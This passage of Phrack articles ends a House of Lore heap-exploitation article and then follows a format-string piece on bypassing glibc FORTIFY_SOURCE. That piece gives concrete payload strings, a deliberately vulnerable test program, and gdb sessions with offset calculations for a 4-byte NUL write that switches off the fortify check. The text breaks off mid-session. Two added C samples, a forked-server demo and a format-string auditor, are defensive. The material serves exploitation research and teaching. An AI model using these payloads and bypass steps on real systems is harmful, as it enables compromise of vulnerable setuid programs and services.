stack and our ability to predict a memory address close enough to a saved
return address that can be overwritten. This should not be an utterly 
impossible task, and we consider that bruteforce is always a possibility
that we will have at hand in the most restrictive situations.

Obviously, the non-exec heap does not affect the techniques described in
this paper, as one might place a shellcode anywhere else, although we
warn that if the heap is not executable it is very likely that the stack 
will not be either. Therefore one should use a ret2libc style attack or 
return into mprotect( ) to avoid this protection.

This is an old theme, and each will know how to analyze problems underlying
the system attacked.

Unfortunately, I do not show a real-life exploit here. But we can talk a 
bit about the reliability and potential of success when we are studying a
vulnerability in the wild.

The preconditions are clear; this has been seen repeatedly throughout
this article. The obvious difference between the PoC's that I presented 
here and the applications you use every day (such as email clients or
web browsers) is that one can not predict at first the current 
state of the heap. And this is really a problem, because as long as it is
not in a fairly stable and predictable state, the chances of exploiting
will be minimal.

But very high-level hackers have already met this class of problems,
and over time have been designing and developing a series of techniques
which allow reordering the heap so that both the position of the allocated
chunks and the data contained within them are parameters controlled by the
user. Among these techniques, we must name the two best known:

   - Heap Spray
   - Heap Feng Shui

You can read something about them in the following paper presented at
BlackHat 2007 [8]. In short we can say that the "Heap Spray" technique
simply fills the heap as far as possible by requesting a large amount of
memory and placing there repetitions of nop sleds and the opportune
shellcode, then simply finds a predictable memory address for the
"primitive 4-byte overwrite". A very clever idea in this technique is to
make the nop sled values equal to the selected address, so that it will be 
self-referential.

Feng Shui is a much more elaborate technique, it first tries to defragment 
the Heap by filling the holes. Then it comes back to create holes in the
upper controlled zone so that the memory remains as:

   [ chunk | hole | chunk | hole | chunk | hole | chunk ]

... and finally tries to create the buffer to overflow in one of these 
holes, knowing that this will always be adjacent to one of its buffers 
containing information controlled by the exploiter.

We will not talk about it more here. We will just say that although some of
these methodologies may seem time consuming and tiring, without them
nobody could create reliable exploits, or obtain success in most of the
attempts.



               << Programming today is a race between software
                  engineers striving to build bigger and better
                  idiot-proof programs, and the Universe trying
                  to produce bigger and better idiots. So far,
                  the Universe is winning. >>

                                                  [ Rich Cook ]



           .---------------.
---[ 6 ---[   Conclusions   ]---
           .---------------.

In this article we have seen how The House of Lore hid inside of itself a
power much greater than we imagined. We also presented a fun example 
showing that, despite not being vulnerable to all the techniques we knew so
far, it was still vulnerable to one that until now had only been described
theoretically.

We detailed a second method of attack, also based on the corruption of a 
largebin; this attack could be an alternative in some circumstances and 
should be as important as the main method of smallbin corruption.

Finally we detailed a way to apply THoL in version 3 of the Ptmalloc 
library, which many thought was not vulnerable to attacks due to the 
imposition of numerous restrictions.

Reviewing and analyzing in depth some of the security mechanisms that have
been implanted in this library allowed us to find that further studies will
be needed to discover new vulnerabilities and areas of code that can be 
manipulated for personal fun and profit.

If you want a tip from me on how to improve your hacking, here goes:

Read everything, study everything... then forget it all and do it 
differently, do it better. Fill your cup, empty your cup and fill it again 
with fresh water.

Finally, I would like to recall that I said the following in my "Malloc
Des-Maleficarum" paper:

     "...and The House of Lore, although not very suitable for a
      credible case, no one can say that is a complete exception..."

With this new article I hope I have changed the meaning of my words, and
shown that sometimes in hacking you make mistakes, but never stop to 
investigate and repair your errors. Everything we do is for fun, and we 
will do it as long as we exist on the land and cyberspace.



               << All truths are easy to understand
                  once they are discovered;
                  the point is to discover them. >>

                                [ Galileo Galilei ]



           .-------------------.
---[ 7 ---[   Acknowledgments   ]---
           .-------------------.

First, I would like to give my acknowledgments to Dreg for his insistence 
that I do something with this paper so that it would not fall into 
oblivion. After a bad time ... I could not give a talk on this subject at 
RootedCon [9], Dreg still graciously encouraged me to finish the 
translation and publish this article in this fantastic e-zine which 
has undoubtedly left its mark etched in hacking history.

Indeed, the last details in the translation of this article are Dreg's 
work, and this would never have been what it is without his invaluable 
help.

For the rest, also thanks to all the people I met in dsrCON!, all very 
friendly, outgoing and all with their particular point of madness. I am not
going to give more names, but, to all of them, thanks.

And remember...

Happy Hacking!



           .--------------.
---[ 8 ---[   References   ]---
           .--------------.

[1] Malloc Maleficarum
    http://www.packetstormsecurity.org/papers/attack/MallocMaleficarum.txt

[2] Malloc Des-Maleficarum
    http://www.phrack.org/issues.html?issue=66&id=10

[3] PTMALLOC (v2 & v3)
    http://www.malloc.de/en/

[4] Reducing the effective entropy of gs cookies
    http://uninformed.org/?v=7&a=2&t=sumry

[5] Electric Fence - Red-Zone memory allocator
    http://perens.com/FreeSoftware/ElectricFence/
    electric-fence_2.1.13-0.1.tar.gz

[6] Jemalloc - A Scalable Concurrent malloc(3) Implementation for FreeBSD
    http://people.freebsd.org/~jasone/jemalloc/bsdcan2006/jemalloc.pdf

[7] Guard Malloc (Enabling the Malloc Debugging Features)
    http://developer.apple.com/mac/library/documentation/Darwin/Reference/
    ManPages/man3/Guard_Malloc.3.html

[8] Heap Feng Shui in JavaScript - BlackHat Europe 2007
    http://www.blackhat.com/presentations/bh-europe-07/Sotirov/
    Presentation/bh-eu-07-sotirov-apr19.pdf

[9] Rooted CON: Congreso de Seguridad Informatica (18-20 Marzo 2010)
    http://www.rootedcon.es/

[10] dnmalloc 
     http://www.fort-knox.org/taxonomy/term/3

[11] OpenBSD malloc
     http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/malloc.c

[12] Dnmaloc - A more secure memory allocator by Yves Younan, 
     Wouter Joosen, Frank Piessens and Hans Van den Eynden
     http://www.orkspace.net/secdocs/Unix/Protection/Description/
     Dnmaloc%20-%20A%20more%20secure%20memory%20allocator.pdf

[13] A new malloc(3) for OpenBSD by Otto Moerbeek
     http://www.tw.openbsd.org/papers/eurobsdcon2009/otto-malloc.pdf



           .----------------.
---[ 9 ---[   Wargame Code   ]---
           .----------------.

In this last section we attach the same program "agents.c" that we saw
above, but adapted to a network environment so that it can be used in a
server exploitation wargame. At the same time the code is a bit more
elaborate and robust.

As usual, "netagents.c" forks a child process (fork) for each connection
made to it, and as each new process has its own heap, each attacker can
confront the vulnerability from scratch. The actions of one do not
influence the others.

The code should be adapted according to the needs of the manager conducting
or developing the wargame (such as the number of allowed incoming
connections or the debugging information you want to give to the attacker
if the game becomes very difficult).

The attached archive includes a makefile which assumes that the compiled
ptmalloc2 library (libmalloc.a) is in the same directory as the source, to
be linked with netagents.c. Each manager should adapt "malloc.c" to print
the information deemed necessary, but the basics would be the changes that
have been made throughout this article, which let the attacker know where
the requested chunks of memory are taken from.

How does the attacker obtain the output of these changes? For simplicity,
"netagents.c" avoids calls to send( ) by closing the standard output
(stdout) and duplicating the recently obtained client socket in its place
(dup(CustomerID)). We use the same trick that shellcodes are expected to
use.

"netagents.c" also includes a new menu option, "Show Heap State", to show
the state of the memory chunks that are being allocated or released during
its execution. This allows you to see whether the head of any free chunk
has been overwritten. After some legal moves, a normal output would be
this:


 +--------------------------------+                                                     
 |    Allocated Chunk (0x8093004) | -> Agents[0]                                        
 +--------------------------------+                                                     
 |   SIZE      =    0x00000019    |                                                     
 +--------------------------------+                                                     

 +--------------------------------+
 |    Allocated Chunk (0x809301c) | -> Agents[1]
 +--------------------------------+             
 |   SIZE      =    0x00000019    |             
 +--------------------------------+             

 +--------------------------------+
 |    Allocated Chunk (0x8093034) | -> Agents[1]->name
 +--------------------------------+                   
 |   SIZE      =    0x00000029    |                   
 +--------------------------------+                   

 +--------------------------------+
 |      Free Chunk (0x8093058)    | -> Agents[1]->lastname
 +--------------------------------+                       
 |   PREV_SIZE  =   0x00000000    |                       
 +--------------------------------+                       
 |   SIZE       =   0x00000089    |                       
 +--------------------------------+                       
 |   FD         =   0x08050168    |                       
 +--------------------------------+                       
 |   BK         =   0x08050168    |
 +--------------------------------+

 +--------------------------------+
 |    Allocated Chunk (0x80930e4) | -> Agents[1]->desc
 +--------------------------------+
 |   SIZE      =    0x00000108    |
 +--------------------------------+


Following the example of the perl exploit presented in 2.2.2, one might
design an exploit in C with a child process continually receiving responses
from the server (menus and prompts), and the parent answering these
questions with a pause, for example one second between answers (if you know
what to respond to make that program work ...). The difficult task is to
predict the addresses on the stack: in the last phase of the attack, the
last reserved chunk should match the frame created by "edit_lastname( )",
since that is where we overwrite the saved return address and where the
program will probably break (obviously, having ASLR enabled adds a new
complexity to overcome).

What happens with failed attempts and segmentation faults? The program
captures SIGSEGV, informs the attacker that something bad has happened
and encourages him to connect again. The child process is the only one that
becomes unstable, and thus a new connection leaves everything clean for a
new attack.
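
The design described in this section (one forked child per connection,
stdout duplicated onto the client socket, SIGSEGV reported to the client),
as an added example; it is not the netagents.c from the attached archive.
socketpair() stands in for accept() so that it runs offline, and MENU,
CRASH, serve_client() and handle_connection() are names invented here.

```c
/* Added illustration, not the article's netagents.c. socketpair() stands in
   for the listening socket and accept(), so the example runs offline. */
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed strings, not the real program's menu or messages. */
static const char MENU[]  = "1) New agent\n2) Show Heap State\n";
static const char CRASH[] = "[!] Segmentation fault. Please reconnect.\n";

static void on_segv(int sig)
{
    (void)sig;
    /* Only async-signal-safe calls in a handler: write(2) and _exit(2). */
    if (write(STDOUT_FILENO, CRASH, sizeof CRASH - 1) < 0) { /* client gone */ }
    _exit(1);
}

/* Child: from here on, everything written to stdout reaches the client. */
static void serve_client(int client_fd, int crash)
{
    /* The article closes stdout and calls dup(); dup2() does both in one
       step and does not depend on fd 1 being the lowest free descriptor. */
    if (dup2(client_fd, STDOUT_FILENO) < 0) _exit(2);
    close(client_fd);
    signal(SIGSEGV, on_segv);
    printf("%s", MENU);
    fflush(stdout);
    if (crash) raise(SIGSEGV);    /* stands in for a fault in the service */
    _exit(0);
}

/* Parent: one child per connection. Returns the child's exit status and
   copies what the client would have received into out. */
int handle_connection(int crash, char *out, size_t outlen)
{
    int sv[2], status = 0;
    size_t used = 0;
    ssize_t n;
    pid_t pid;

    if (outlen == 0 || socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return -1;
    fflush(NULL);             /* the child must not inherit pending output */
    pid = fork();
    if (pid < 0) { close(sv[0]); close(sv[1]); return -1; }
    if (pid == 0) { close(sv[0]); serve_client(sv[1], crash); }
    close(sv[1]);
    while (used + 1 < outlen &&
           (n = read(sv[0], out + used, outlen - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(sv[0]);
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char buf[256];
    int rc = handle_connection(1, buf, sizeof buf);
    printf("crashing client saw:\n%s(exit %d)\n", buf, rc);
    rc = handle_connection(0, buf, sizeof buf);
    printf("next client saw:\n%s(exit %d)\n", buf, rc);
    return 0;
}
```

The second call shows the point made above: the crash stays inside the
child that served the first client, and the next connection starts clean.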

The last aid that one could provide to the attacker is to deliver the
source code, so it can be adapted to study the vulnerability locally
before carrying the attack over to the network environment.


Attach:


--------[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x43, Phile #0x09 of 0x10

|=-----------------------------------------------------------------------=|
|=-------------------=[ A Eulogy for Format Strings ]=-------------------=|
|=-----------------------------------------------------------------------=|
|=-----------------------=[ by Captain Planet ]=-------------------------=|
|=-----------------------------------------------------------------------=|

Index

------[ 0. Introduction
------[ 1. Glibc's FORTIFY_SOURCE
------[ 2. Bypassing FORTIFY_SOURCE
------[ 3. Exploitation
          A.  Dummy program
          B.  CUPS lppasswd bug
          C.  TODO- ASLR
------[ 4. Afterword


------[ 0. Introduction

Today the Windows CRT disables %n by default [0]. And likewise, glibc's
FORTIFY_SOURCE patches provide protection mechanisms which render
exploitation impossible. Objective-C isn't being considered, but I'm told
you can have plenty of fun there too. Even if format strings weren't a
critically endangered species, they've been demoted to the class of
infoleak. The great thing about format strings of course was that they
provided both a read and write primitive. They were the `spork` of
exploitation. ASLR? PIE? NX Stack/Heap? No problem, fmt had you covered.

The story goes that around 2000 everybody was hunting down format strings.
Just about everything was vulnerable. Check out the TESO article in the
links. It was pretty outrageous. CORE exploited pretty much everything with
locales too [1]. But today, those days are long gone. Unless of course
you're hacking edus, in which case you can still use locale bugs to pop
root shells on PMOS technology.

A few months ago something funny happened. A guy by the name of Ronald
Volgers [2] had his way with CUPS lppasswd, which was shipped root setuid 
in Ubuntu and Debian. Nice find man! Locale bugs, oh yeah, awesome!

Unfortunately, the aforementioned patch makes fmt str exploitation quite
unlikely.

In detail, FORTIFY_SOURCE provides two countermeasures against fmt
strings.

  1)   Format strings containing the %n specifier may not be located at a
       writeable address in the memory space of the application.

  2)   When using positional parameters, all arguments within the range 
       must be consumed. So to use %7$x, you must also use 1,2,3,4,5 and 6.

But that's okay since the FORTIFY_SOURCE patch is not really all that
complete. (-: Why? Because glibc is really really weird code. It amazes me 
that someone would travel all around the world and take credit for glibc 
when they did not even write it. Actually, it makes perfect sense, nobody 
with any dignity would admit to writing any part of glibc to public 
audiences. Don't get me wrong, glibc lets pretty good stuff happen to my 
computer. The code is pretty hard to look at though, you wouldn't introduce
her to your parents if you know what I mean...

What you're about to read is slightly harder than writing a format string
and a little bit easier than building glibc itself. (Glibc binaries are
ideal for an ELF VX because of the difficulty of compiling them).
The prerequisite is understanding format string exploitation. It was last
written about in phrack here [3] if you need a refresher. If you have never
exploited a format string vuln, seek the article by 'rebel' [6]. It is one
of the most skilled and digestible discourses available.

So let's dive right in.

------[ 1. Glibc's FORTIFY_SOURCE

===========================================================================
WARNING: THE REST OF THIS ARTICLE INCLUDES GLIBC CODE WHICH MAY INDUCE 
CHEST PAIN, VOMITING, BLACKOUTS, or PERMANENT LOSS OF EYESIGHT. ALL 
ATTEMPTS TO KEEP GLIBC CODE TO A MINIMUM HAVE BEEN MADE BY THE AUTHOR.
===========================================================================

"%49150u %4849$hn %1$*269158540$x %1$*13996$x %1073741824$d"

Have you seen a format string like that before? It makes positional 
parameters look less attractive, doesn't it?

So how does this patch supposedly work?

To turn it on, the binary must be compiled with `-D_FORTIFY_SOURCE=2`
and an optimization level of at least -O2. This is likely because of the
compiler pass in which the patch is implemented.

So the following happens.

   0x08048509 <+57>:  mov    %ebx,0x4(%esp)
   0x0804850d <+61>:  movl   $0x1,(%esp)
   0x08048514 <+68>:  call   0x80483c4 <__printf_chk@plt>

First, calls to printf, etc. get rerouted to __*_chk in your compiled
binary and the first argument, :flag:, is passed as 1.

A.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
File: libc/debug/printf_chk.c

/* Write formatted output to stdout from the format string FORMAT.  */
int
___printf_chk (int flag, const char *format, ...)
{
  va_list ap;
  int done;

  _IO_acquire_lock_clear_flags2 (stdout);
  if (flag > 0)
    stdout->_flags2 |= _IO_FLAGS2_FORTIFY;

  va_start (ap, format);
  done = vfprintf (stdout, format, ap);
  va_end (ap);

  if (flag > 0)
    stdout->_flags2 &= ~_IO_FLAGS2_FORTIFY;
  _IO_release_lock (stdout);

  return done;
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The function sets the _IO_FLAGS2_FORTIFY bit to ON in the FILE* structure 
to enable the FORTIFY checks. This is sort of clever, as the bit will 
always get toggled on when entering dangerous functions. You can not 
universally disable the mechanism very easily. But this itself does not 
actually guarantee any kind of security.

Under libio/libio.h the following secondary flags are defined:

#define _IO_FLAGS2_MMAP 1         //fopen 'm' mmap access mode
#define _IO_FLAGS2_NOTCANCEL 2    //open/read/write should not be used as
                                  //thread cancellation points
#ifdef _LIBC
# define _IO_FLAGS2_FORTIFY 4     //enable fortify security checks
#endif
#define _IO_FLAGS2_USER_WBUF 8    //wide buffer (2-byte) support funk
#ifdef _LIBC
# define _IO_FLAGS2_SCANF_STD 16  // %a support for scanf
#endif

Disabling the entire flags buffer should not be too much trouble, but may
lead to some inconsistencies if the file stream pointer is opened with 'm' 
in the mode parameter.

The astute reader will be wondering about functions such as vsnprintf, 
which require no file stream pointer. Well, glibc provides an okay 
solution. A file stream pointer is made on the stack with a callback that 
writes to a buffer instead of a file descriptor. This file stream pointer 
is then passed along to vfprintf.

Now, with the _IO_FLAGS2_FORTIFY bit set, there are two protections that 
are enabled.

B. Protection #1
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
File: libc/stdio-common/vfprintf.c

   LABEL (form_number):                                                   \
      if (s->_flags2 & _IO_FLAGS2_FORTIFY)                                \
        {                                                                 \
          if (! readonly_format)                                          \
            {                                                             \
              extern int __readonly_area (const void *, size_t)           \
                attribute_hidden;                                         \
              readonly_format                                             \
                = __readonly_area (format, ((STR_LEN (format) + 1)        \
                                            * sizeof (CHAR_T)));          \
            }                                                             \
          if (readonly_format < 0)                                        \
            __libc_fatal ("*** %n in writable segment detected ***\n");   \
        }                                                                 \
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

If the format string payload containing a %n is located in a writeable 
memory area such as the stack or BSS or DATA or the heap, this patch will 
detect it and error out. Besides a DoS, this patch renders format strings 
pretty harmless.


C. Protection #2
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
File: libc/stdio-common/vfprintf.c
    /* Determine the number of arguments the format string consumes.  */
    nargs = MAX (nargs, max_ref_arg);

    /* Allocate memory for the argument descriptions.  */
    args_type = alloca (nargs * sizeof (int));
    memset (args_type, s->_flags2 & _IO_FLAGS2_FORTIFY ? '\xff' : '\0',
            nargs * sizeof (int));
    args_value = alloca (nargs * sizeof (union printf_arg));
    args_size = alloca (nargs * sizeof (int));
..
    for (cnt = 0; cnt < nargs; ++cnt)
..
      switch (args_type[cnt])
..
        case -1:
          /* Error case.  Not all parameters appear in N$ format
             strings.  We have no way to determine their type.  */
          assert (s->_flags2 & _IO_FLAGS2_FORTIFY);
          __libc_fatal ("*** invalid %N$ use detected ***\n");
        }
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The effect of this second patch is that all of the args_type entries are
set to -1 by default. If there are any argument holes in between which do
not get processed, they are left as -1. So the effect is that:

  %4$x

would be invalid but

  %4$x %2$x %1$x %3$x

would be okay.

To be honest, I do not really see this as some huge security improvement 
but more of a nuisance. It does not really stop infoleaks much. Maybe they
wanted to prevent people from exploiting 8 character format strings, 
because those are really common in the wargaming scene.


------[ 2. Bypassing FORTIFY_SOURCE

Now, if you were paying attention, you saw a bunch of allocas in 1-C. That
:nargs: variable is the calculated maximum number of arguments. If a
fmt str has simple arguments, the value is just that number. But, if a fmt
str uses width arguments or positional parameters (often called direct
parameters in other format string articles), then those also factor into
the maximum :nargs: value.

As an example in this string,
%x %x %x %13981938$x,

13981938 is the :nargs: value being passed to the alloca functions in code
snippet 1-C.

Do not get too excited. This is not enough for generic control. 
Unfortunately, we can not do the same stack shifting as in [4] since we are
in a context past the initial stack frame allocation. At the epilogue of 
the function, a base register will be used to collapse the stack, making 
stack shifting less useful without being accompanied by memory clobbering. 
This is true of the C compilers for many architectures. They pretty much
all implement some sort of easy stack clean-up with a base register, so
alloca itself is difficult to attack.

Instead, it is the operations that use the allocated memory that must be
exploited. The integer overflow can be used to trigger all sorts of memory
trespasses.

One other thing to do is shift the stack into the heap using the alloca. 
This also turns out to be difficult because of those memset operations.

But we do have a loss of state. And as always, from a loss of state new
opportunities arise. We are in the land of undefined. Hi mom and dad!

This article will use one such trespass opportunity to bypass 
FORTIFY_SOURCE. It should be noted that others exist, but may be a bit 
harder to utilize than this one.

<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

Arbitrary 4-byte NUL overwrite.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
File: stdio-common/vfprintf.c

    /* Fill in the types of all the arguments.  */
    for (cnt = 0; cnt < nspecs; ++cnt)
      {
      /* If the width is determined by an argument this is an int.  */
      if (specs[cnt].width_arg != -1)
        args_type[specs[cnt].width_arg] = PA_INT;

enum
{                               /* C type: */
  PA_INT,                       /* int */
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Quick summary of the code:
args_type[ ATTACKER_OFFSET ] = 0x00000000;

Explanation:
The above code is required to process width arguments that are passed in as
parameters.

For example:

        %1$*269096872$x

Effectively does:
        //specs[cnt].width_arg = 269096872
        args_type[specs[cnt].width_arg] = 0

..which, if your stack is set up just right, can toggle off that 
_IO_FLAGS2_FORTIFY bit in the `stdout` FILE structure.

Remember that :args_type: was one of the buffers allocated on the stack in
the alloca snippet above in 1-C and is an array of an integer base type.

Care must be taken as the alloca becomes a bit of a problem when nargs gets
set to a large value. This will likely shift the stack to somewhere 
unmapped. The next push or call instructions would result in a crash, 
preventing proper exploitation.

So the key constraints around :nargs: are as follows:

1) the stack must be shifted somewhere sane
2) the memset operation must not hit an unmapped page.

The easiest way to meet these two constraints is to use an integer
overflow. Since no bounds checking occurs on :nargs:, you can artificially
keep the stack in-place with this: `%1073741824$`. No specifier is really
required and you can end it with just a $ sign. The second constraint is
also satisfied because the memset will be called with a length parameter
of 0.

The details of the allocas are a little bit more complex if you look at the
assembly. For our purposes, they roughly end up doing:

esp -= nargs * (4)
esp -= nargs * (12)
esp -= nargs * (4)

The 1073741824*4 happens to be 0 when truncated into a 32-bit integer. This
and other factors of 1073741824 prove to be sufficient for side-stepping
the alloca constraints.

This concludes the arbitrary 4-byte NUL overwrite.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
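
The hole rule from 1-C and the 32-bit wrap of :nargs: described above, as
an added example that is neither glibc code nor part of the original
article: an auditor that parses a format string, numbers its arguments,
and reports holes, %n and whether nargs*4 and nargs*12 wrap on a 32-bit
target. AUDIT_MAX_ARGS, struct fmt_audit and audit_format() are names
invented here, and the reject policy is an assumption.

```c
/* Added illustration, not glibc code. Sizes are modelled for a 32-bit target. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define AUDIT_MAX_ARGS 4096u  /* assumed policy cap, not a glibc constant */

struct fmt_audit {
    uint64_t max_ref;     /* highest argument position used (1-based)   */
    unsigned holes;       /* unused positions below max_ref (up to cap) */
    int      has_n;       /* a %n conversion is present                 */
    uint32_t type_bytes;  /* nargs * 4 as a 32-bit size (args_type)     */
    uint32_t value_bytes; /* nargs * 12 as a 32-bit size (args_value)   */
    int      wraps;       /* nargs * 12 does not fit in 32 bits         */
    int      reject;      /* verdict of the assumed policy below        */
};

struct scan {
    struct fmt_audit a;
    unsigned char seen[AUDIT_MAX_ARGS];
    uint64_t seq;         /* last position handed to a non-N$ argument */
};

/* Read decimal digits, saturating instead of overflowing. */
static const char *read_num(const char *p, uint64_t *out)
{
    uint64_t v = 0;
    for (; isdigit((unsigned char)*p); p++)
        if (v < UINT64_MAX / 10)
            v = v * 10 + (uint64_t)(*p - '0');
    *out = v;
    return p;
}

static void note_ref(struct scan *s, uint64_t n)
{
    if (n > s->a.max_ref) s->a.max_ref = n;
    if (n >= 1 && n <= AUDIT_MAX_ARGS) s->seen[n - 1] = 1;
}

/* Width or precision: digits, "*" (next sequential argument) or "*N$". */
static const char *width_or_prec(const char *p, struct scan *s)
{
    uint64_t n;
    const char *q;
    if (*p != '*') return read_num(p, &n);
    q = read_num(p + 1, &n);
    if (q != p + 1 && *q == '$') { note_ref(s, n); return q + 1; }
    note_ref(s, ++s->seq);
    return p + 1;
}

struct fmt_audit audit_format(const char *fmt)
{
    struct scan s;
    const char *p = fmt, *q;
    uint64_t n, data_arg, top, i;

    memset(&s, 0, sizeof s);
    while (*p) {
        if (*p++ != '%') continue;
        if (*p == '%') { p++; continue; }
        data_arg = 0;
        q = read_num(p, &n);
        if (q != p && *q == '$') { data_arg = n; p = q + 1; }
        while (*p && strchr("-+ #0'", *p)) p++;        /* flags */
        p = width_or_prec(p, &s);
        if (*p == '.') p = width_or_prec(p + 1, &s);
        while (*p && strchr("hlLqjzt", *p)) p++;       /* length modifiers */
        if (*p == 'n') s.a.has_n = 1;
        if (data_arg) note_ref(&s, data_arg);          /* %N$... */
        else if (*p) note_ref(&s, ++s.seq);            /* plain %x, %d, ... */
        if (*p) p++;
    }
    /* Protection #2: every position up to the maximum must be referenced. */
    top = s.a.max_ref < AUDIT_MAX_ARGS ? s.a.max_ref : AUDIT_MAX_ARGS;
    for (i = 0; i < top; i++)
        if (!s.seen[i]) s.a.holes++;
    /* The alloca() sizes as a 32-bit size_t computes them (modulo 2^32). */
    s.a.type_bytes  = (uint32_t)s.a.max_ref * 4u;
    s.a.value_bytes = (uint32_t)s.a.max_ref * 12u;
    s.a.wraps  = s.a.max_ref > UINT32_MAX / 12u;
    s.a.reject = s.a.has_n || s.a.holes > 0 || s.a.max_ref > AUDIT_MAX_ARGS;
    return s.a;
}

int main(void)
{
    /* Constructed inputs. */
    const char *in[] = { "%4$x", "%4$x %2$x %1$x %3$x", "%1$x %1073741824$" };
    for (size_t i = 0; i < sizeof in / sizeof in[0]; i++) {
        struct fmt_audit a = audit_format(in[i]);
        printf("%-20s nargs=%llu holes=%u wraps=%d reject=%d\n", in[i],
               (unsigned long long)a.max_ref, a.holes, a.wraps, a.reject);
    }
    return 0;
}
```

A bound on nargs checked before the size multiplications, as the cap does
here, is what keeps a buffer from being sized to zero bytes while it is
still indexed with a large argument number.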


The first patch (1-B) can be disabled by clearing that _IO_FLAGS2_FORTIFY
bit in the file stream pointer. Typically it will be the only flag enabled
on the file stream pointer. In the unlikely case that one of the other
bits was set, for example _IO_FLAGS2_MMAP, inconsistencies may arise when
the file stream pointer is closed. This may or may not affect
exploitability.

We will now revisit the second part of the patch. It makes any format
string exploit less flexible. The loop on nargs has to be terminated early
to avoid the assert and the __libc_fatal when a "hole" in the arguments is
discovered. By hole, I am referring to the code in (1-C) which checks the
:args_type: value against -1. Remember that the fortify source patch won't
let you access %5$x without also accessing %1$? %2$? %3$? and %4$?. That is
what is meant by 'hole' in this context.

The termination of that loop can coincidentally happen all by itself if the
stack is aligned correctly. The loop will hit out of bounds of the alloca
created buffers and self terminate when :nargs: is set to 0, provided that
:nargs: is stored by the compiler on the stack. If it fails to do this, an
assert() statement will be triggered, preventing exploitation.

Or, the 4-byte NUL write can be reused to bypass the loop reliably.

One instance of a successful bypass can then be performed in two easy 
steps.

 1. Turn off the _IO_FLAGS2_FORTIFY bit to allow %n from a writeable address
 2. Set nargs=0 to skip the value-filling loop.

Note that bypassing the loop via #2 requires us to dig further down the 
stack to find our user input since the same loop is responsible for filling
in the args_value array. If you have ever attempted to exploit a format
string by truncating a pointer and reusing it as destination on glibc, you 
probably failed because of that args_value array.

------[ 3. Exploitation

In standard phrack style we will first do this on a test binary and then on
a real-world binary to disprove any accusations of academic tendencies, 
like thought experiments. Feel free to skip to part B.

------------[ A. Dummy Test Program for clarity

Note: ASLR is disabled and the program has an executable stack.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//File: test.c
//gcc -D_FORTIFY_SOURCE=2 -O2
#include <stdio.h>

int main(){
  char buf[256];
  fgets(buf, sizeof(buf), stdin);
  printf(buf);   // deliberately vulnerable: user input used as the format
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

captain@planet:~/research/fmt/article$ ./a.out
%n
*** %n in writable segment detected ***
Aborted
captain@planet:~/research/fmt/article$ ./a.out
%4$x
*** invalid %N$ use detected ***
Aborted

Oh nooO! Scary format string protections are making everything hurt.

ENABLE POWER MORPHING LINUX SHARING COMMUNITY POWER
----
Alright remember the process kids.
1. Disable fortify source
2. Set nargs = 0
3. Enjoy the %n

So first, let's figure out where that arbitrary 4-byte NUL write is on our
system. We will pick some ridiculous destination, like %1$*269168516$. If
it doesn't crash, keep incrementing that by about 20000.

So we'll send the following as our investigative payload. The first part
should trigger the NUL write. The second part should keep the stack sane.

%1$*269168516$x %1073741824$

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
captain@planet:~/research/fmt/article$ gdb -q ./a.out
Reading symbols from /home/captain/research/fmt/article/a.out...(no
debugging symbols found)...done.
(gdb) r
Starting program: /home/captain/research/fmt/article/a.out
%1$*269168516$x %1073741824$

Program received signal SIGSEGV, Segmentation fault.
0x001888f1 in _IO_vfprintf_internal (s=0x29f4e0, format=0xbffeb2dc
"%1$*269168516$x %1073741824$\n", ap=0xbffeb2c8 "@\364)") at vfprintf.c:1735
1735  vfprintf.c: No such file or directory.
  in vfprintf.c
(gdb) x/i $pc
=> 0x1888f1 <_IO_vfprintf_internal+11489>:  movl   $0x0,(%ecx,%eax,4)
(gdb)
%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%

The fortify source bit will be somewhere inside of the file stream pointer
over at s=0x29f4e0.

    stdout->_flags2 |= _IO_FLAGS2_FORTIFY;

On this target machine, it happens to be @+60

0x29f51c <_IO_2_1_stdout_+60>:  0x00000004

Since the operations here are relative, ASLR is not too big of an issue and
once you find your offset, it's pretty consistent (YMMV).

Here is the equation
$ecx + $eax*4  should = 0x29f51c

(gdb) p/d ((0x10029f51c-$ecx) & 0xffffffff)/4
$11 = 269145003

Counting starts from 0, so add 1 to that for the payload.

%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
captain@planet:~/research/fmt/article$ gdb -q ./a.out
Reading symbols from /home/captain/research/fmt/article/a.out...(no
debugging symbols found)...done.
(gdb) break vfprintf
Function "vfprintf" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (vfprintf) pending.
(gdb) r
Starting program: /home/captain/research/fmt/article/a.out
